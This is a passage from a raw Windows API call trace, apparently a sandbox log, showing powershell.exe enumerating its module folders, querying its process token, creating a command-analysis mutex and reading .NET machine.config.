lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0265.537] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0265.542] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0265.542] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0265.544] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0265.545] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0265.545] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0265.547] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0265.549] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0265.554] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0265.555] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0265.556] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0265.588] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0265.590] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e5f0) returned 1 [0265.591] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.591] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0265.593] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0265.612] CoTaskMemAlloc (cb=0x20e) returned 0x530340 [0265.612] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x530340, nSize=0x105 | out: lpBuffer="") returned 0x0 [0265.612] CoTaskMemFree (pv=0x530340) [0265.618] CoTaskMemAlloc (cb=0x20c) returned 0x530340 [0265.618] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x530340 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0265.619] CoTaskMemFree (pv=0x530340) [0265.619] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0265.621] GetCurrentProcess () returned 0xffffffffffffffff [0265.622] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81e6c8 | out: TokenHandle=0x1b81e6c8*=0x67c) returned 1 [0265.622] GetTokenInformation (in: TokenHandle=0x67c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1b81e7c8 | out: TokenInformation=0x0, ReturnLength=0x1b81e7c8) returned 0 [0265.622] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1a63e280 [0265.623] GetTokenInformation (in: TokenHandle=0x67c, TokenInformationClass=0x1, TokenInformation=0x1a63e280, TokenInformationLength=0x2c, ReturnLength=0x1b81e7c8 | out: TokenInformation=0x1a63e280, ReturnLength=0x1b81e7c8) returned 1 [0265.623] LocalFree (hMem=0x1a63e280) returned 0x0 [0265.625] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x250a868, cbSid=0x1b81e7c0 | out: pSid=0x250a868*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x1b81e7c0) returned 1 [0265.628] CreateMutexW (lpMutexAttributes=0x250aa28, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x564 [0265.631] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b81e660*=0x564, lpdwindex=0x1b81e434 | out: lpdwindex=0x1b81e434) returned 0x0 [0265.760] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b81e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0265.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e5e0) returned 1 [0265.760] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b81e6c0 | out: lpFileInformation=0x1b81e6c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0265.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e5a0) returned 1 [0265.848] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x1b81e040, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0265.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e520) returned 1 [0265.848] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x684 [0265.848] GetFileType (hFile=0x684) returned 0x1 [0265.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e490) returned 1 [0265.848] GetFileType (hFile=0x684) returned 0x1 [0266.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b81cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0266.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b81cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0266.036] CoTaskMemAlloc (cb=0x20c) returned 0x1a9d2a80 [0266.036] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a9d2a80, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0266.036] CoTaskMemFree (pv=0x1a9d2a80) [0266.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1b81cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0266.044] GetCurrentProcess () returned 0xffffffffffffffff [0266.044] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81cf88 | out: TokenHandle=0x1b81cf88*=0x688) returned 1 [0266.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x1b81c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30 [0266.048] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1b81d040 | out: lpFileInformation=0x1b81d040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0266.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1b81c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0266.051] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1b81d028 | out: lpFileInformation=0x1b81d028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0266.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1b81c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0266.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81cea0) returned 1 [0266.051] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x68c [0266.051] GetFileType (hFile=0x68c) returned 0x1 [0266.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81ce10) returned 1 [0266.051] GetFileType (hFile=0x68c) returned 0x1 [0266.053] GetFileSize (in: hFile=0x68c, lpFileSizeHigh=0x1b81cf78 | out: lpFileSizeHigh=0x1b81cf78*=0x0) returned 0x8c8f [0266.053] ReadFile (in: hFile=0x68c, lpBuffer=0x250f340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81cee8, lpOverlapped=0x0 | out: lpBuffer=0x250f340*, lpNumberOfBytesRead=0x1b81cee8*=0x1000, lpOverlapped=0x0) returned 1 [0266.059] ReadFile (in: hFile=0x68c, lpBuffer=0x250f340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81ccc8, lpOverlapped=0x0 | out: lpBuffer=0x250f340*, lpNumberOfBytesRead=0x1b81ccc8*=0x1000, lpOverlapped=0x0) returned 1 [0266.060] ReadFile (in: hFile=0x68c, lpBuffer=0x250f340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81cab8, lpOverlapped=0x0 | out: lpBuffer=0x250f340*, lpNumberOfBytesRead=0x1b81cab8*=0x1000, lpOverlapped=0x0) returned 1 [0266.061] ReadFile (in: hFile=0x68c, lpBuffer=0x250f340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81cab8, lpOverlapped=0x0 | out: lpBuffer=0x250f340*, lpNumberOfBytesRead=0x1b81cab8*=0x1000, lpOverlapped=0x0) returned 1 [0266.061] ReadFile (in: hFile=0x68c, lpBuffer=0x250f340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81cab8, lpOverlapped=0x0 | out: lpBuffer=0x250f340*, lpNumberOfBytesRead=0x1b81cab8*=0x1000, lpOverlapped=0x0) returned 1 [0266.061] ReadFile (in: hFile=0x68c, lpBuffer=0x250f340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81c978, lpOverlapped=0x0 | out: lpBuffer=0x250f340*, lpNumberOfBytesRead=0x1b81c978*=0x1000, lpOverlapped=0x0) returned 1 [0266.080] ReadFile (in: hFile=0x68c, lpBuffer=0x250f340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81cbb8, lpOverlapped=0x0 | out: lpBuffer=0x250f340*, lpNumberOfBytesRead=0x1b81cbb8*=0x1000, lpOverlapped=0x0) returned 1 [0266.081] ReadFile (in: hFile=0x68c, lpBuffer=0x250f340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81ca68, lpOverlapped=0x0 | out: lpBuffer=0x250f340*, lpNumberOfBytesRead=0x1b81ca68*=0x1000, lpOverlapped=0x0) returned 1 [0266.081] ReadFile (in: hFile=0x68c, lpBuffer=0x250f340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81ca68, lpOverlapped=0x0 | out: lpBuffer=0x250f340*, lpNumberOfBytesRead=0x1b81ca68*=0xc8f, lpOverlapped=0x0) returned 1 [0266.082] ReadFile (in: hFile=0x68c, lpBuffer=0x250f340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81cb88, lpOverlapped=0x0 | out: lpBuffer=0x250f340*, lpNumberOfBytesRead=0x1b81cb88*=0x0, lpOverlapped=0x0) returned 1 [0266.082] CloseHandle (hObject=0x68c) returned 1 [0266.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b81cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0266.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b81cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0266.082] CoTaskMemAlloc (cb=0x20c) returned 0x1a9d2ca0 [0266.082] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a9d2ca0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0266.083] CoTaskMemFree (pv=0x1a9d2ca0) [0266.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1b81cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0266.083] GetCurrentProcess () returned 0xffffffffffffffff [0266.083] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81d188 | out: TokenHandle=0x1b81d188*=0x68c) returned 1 [0266.084] GetCurrentProcess () returned 0xffffffffffffffff [0266.084] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81d188 | out: TokenHandle=0x1b81d188*=0x690) returned 1 [0266.085] GetCurrentProcess () returned 0xffffffffffffffff [0266.085] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81cf88 | out: TokenHandle=0x1b81cf88*=0x694) returned 1 [0266.085] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1b81d040 | out: lpFileInformation=0x1b81d040*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0266.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b81c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0266.086] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1b81d028 | out: lpFileInformation=0x1b81d028*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0266.087] GetCurrentProcess () returned 0xffffffffffffffff [0266.087] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81d188 | out: TokenHandle=0x1b81d188*=0x698) returned 1 [0266.087] GetCurrentProcess () returned 0xffffffffffffffff [0266.087] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81d188 | out: TokenHandle=0x1b81d188*=0x69c) returned 1 [0266.098] GetCurrentProcess () returned 0xffffffffffffffff [0266.098] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81ced8 | out: TokenHandle=0x1b81ced8*=0x6a0) returned 1 [0266.147] GetCurrentProcess () returned 0xffffffffffffffff [0266.147] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81cee8 | out: TokenHandle=0x1b81cee8*=0x6a4) returned 1 [0266.240] ReadFile (in: hFile=0x684, lpBuffer=0x2537158, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e388, lpOverlapped=0x0 | out: lpBuffer=0x2537158*, lpNumberOfBytesRead=0x1b81e388*=0x8a2, lpOverlapped=0x0) returned 1 [0266.326] EtwEventRegister () returned 0x0 [0266.346] GetCurrentProcess () returned 0xffffffffffffffff [0266.346] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81dd28 | out: TokenHandle=0x1b81dd28*=0x6ac) returned 1 [0266.348] GetCurrentProcess () returned 0xffffffffffffffff [0266.348] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b81dd38 | out: TokenHandle=0x1b81dd38*=0x6b0) returned 1 [0267.092] ReadFile (in: hFile=0x684, lpBuffer=0x2537158, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e358, lpOverlapped=0x0 | out: lpBuffer=0x2537158*, lpNumberOfBytesRead=0x1b81e358*=0x0, lpOverlapped=0x0) returned 1 [0267.116] CloseHandle (hObject=0x684) returned 1 [0267.117] GetFullPathNameW (in: 